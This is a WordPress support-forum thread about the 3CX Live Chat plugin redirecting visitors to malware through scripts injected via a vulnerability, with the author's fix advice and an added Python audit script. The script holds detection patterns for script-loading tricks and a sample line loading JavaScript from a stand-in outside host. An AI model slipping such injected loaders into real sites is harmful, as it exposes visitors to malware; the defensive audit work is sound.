Support » Plugin: 3CX Live Chat » Infected with malware

  • This plugin used to be fine, but as of 5/16/19 or 5/17/19 the plugin will redirect viewers to malware
    Proof:

Viewing 11 replies - 1 through 11 (of 11 total)
  • Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    When did you update this plugin?

    It currently says version 8.0.27 in my WordPress plugin page.
    I hate to say for sure that I even have done a manual update for it (at least in the last few days). I don’t think that I have, but it’s possible. It’s not that I updated it and then found this issue. I just started working on my product this morning after getting to the office and it started doing the redirect. Yesterday when I was working on my products it was working fine.

    • This reply was modified 1 year, 8 months ago by radial.
    Plugin Author WP-LiveChat

    (@wp-livechat)

    We’ve updated the plugin this morning with version 8.0.28 which contains the fix for the vulnerability.

    We’re also looking into how to help users restore their website functionality back to normal either with a further update or manual workaround. Please update to version 8.0.28 the soonest.

    Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    Hi All, the plugin author responded 35 minutes ago but their response was caught up in the forum’s spam queue. Please remain calm and follow that advice.

    If you are interested in this bit:

    We’re also looking into how to help users restore their website functionality back to normal either with a further update or manual workaround. Please update to version 8.0.28 the soonest.

    You will need to consider opening your own individual threads here: https://wordpress.org/support/plugin/wp-live-chat-support/#new-post

    Plugin Author WP-LiveChat

    (@wp-livechat)

    Version 8.0.27 has a vulnerability on the GDPR page: if admins click a malicious URL while logged in, there’s a chance that some external malicious JS file is added to the custom script section.

    In order to patch yourself against the vulnerability: Uninstall version 8.0.27 and install version 8.0.29 which we will be committing shortly. This version fixes the vulnerability.

    Also check the menu Settings / Custom Scripts and clean up the unwanted code if any is present.

    • This reply was modified 1 year, 8 months ago by Andrew Nevins.
    • This reply was modified 1 year, 8 months ago by WP-LiveChat.

    Thank you Andrew and wp-livechat!

    Plugin Author WP-LiveChat

    (@wp-livechat)

    We’ve actually responded very swiftly to this forum post, but unfortunately our posts keep pending moderator review which usually takes 30 minutes up to an hour or so.

    @tarheit2 Ensure you have removed the malicious code. wp admin -> Live Chat -> Settings -> Custom Scripts and removing the Custom JS that had been injected

    • This reply was modified 1 year, 8 months ago by radial.
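
Added example, not part of the original thread or the plugin's code: a small Python check for the cleanup step described above (Settings / Custom Scripts). It takes the text copied out of that setting and reports script hosts that are not on an allowlist, plus constructs commonly used to load a script indirectly. The allowlist, the function name and the sample text are assumptions constructed for illustration.

```python
import re
import sys
from urllib.parse import urlparse

# Assumption: hosts the site owner intentionally loads scripts from; edit for your site.
ALLOWED_HOSTS = {"www.example.com"}

# Absolute and protocol-relative URLs inside the pasted script text.
URL_RE = re.compile(r"""(?:https?:)?//[^\s'"<>)]+""", re.I)

# Heuristics only: constructs that can pull in or hide a remote script.
INDIRECT_LOADS = {
    "eval": re.compile(r"\beval\s*\("),
    "atob": re.compile(r"\batob\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode", re.I),
    "document.write": re.compile(r"document\.write(?:ln)?\s*\("),
    "createElement(script)": re.compile(r"createElement\s*\(\s*['\"]script['\"]", re.I),
}

def audit_custom_script(text, allowed_hosts=ALLOWED_HOSTS):
    """Return (unexpected_hosts, flags) for text copied from the Custom Scripts setting."""
    hosts = set()
    for match in URL_RE.finditer(text):
        url = match.group(0)
        if url.startswith("//"):          # protocol-relative reference
            url = "https:" + url
        host = (urlparse(url).hostname or "").lower()
        # Require a dot so a compact "//comment" is not reported as a host.
        if "." in host and host not in allowed_hosts:
            hosts.add(host)
    flags = sorted(name for name, rx in INDIRECT_LOADS.items() if rx.search(text))
    return sorted(hosts), flags

# Constructed sample: an owner snippet followed by an unexpected external loader.
SAMPLE = """
// site owner's own snippet
console.log('chat loaded from https://www.example.com/chat');
var s = document.createElement('script');
s.src = 'https://cdn.unknown-host.invalid/loader.js';
document.head.appendChild(s);
"""

if __name__ == "__main__":
    # Usage: python audit.py saved_custom_script.txt   (no argument: run on SAMPLE)
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE
    hosts, flags = audit_custom_script(text)
    print("unexpected script hosts:", hosts or "none")
    print("indirect-load constructs:", flags or "none")
```

An empty result does not mean the site is clean: as the moderator notes further down, the compromise may extend beyond the Custom Scripts setting.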
    Plugin Author WP-LiveChat

    (@wp-livechat)

    The so-called PRO is deprecated. There is no PRO anymore. We’ve deprecated it entirely and merged its functionality into 1 fully functional free plugin that’s only hosted here on wordpress.org.

    If you have installed the so-called PRO, please uninstall it entirely and use the latest .29 version instead.

    We’ve taken an entirely new direction over the past 1-2 months now, have hired an entirely new team of developers for the plugin and plan to work on making the plugin much better and reliable. The ‘Pro’ deprecation and moving everything to be completely free was basically our first step towards all this. The next step is to improve the reliability and general functionality of the plugin. Our new team also includes a security auditing engineer who will be checking everything extremely thoroughly.

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    I’ve closed this topic and have temporarily flagged the accounts that posted malware samples. Those and other replies have been archived.

    Update the plugin and do not post malware samples again. That’s not for these forums and gets removed when found.

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    If you are hacked or think you are hacked, see this reply.

    https://wordpress.org/support/topic/infected-with-malware-3/page/2/#post-11543678

    Give this a good read after that. The compromise may be more than just the Custom Scripts settings.

    https://wordpress.org/support/article/faq-my-site-was-hacked/

    When you have successfully deloused your site then consider giving this a read too.

    https://wordpress.org/support/article/hardening-wordpress/

  • The topic ‘Infected with malware’ is closed to new replies.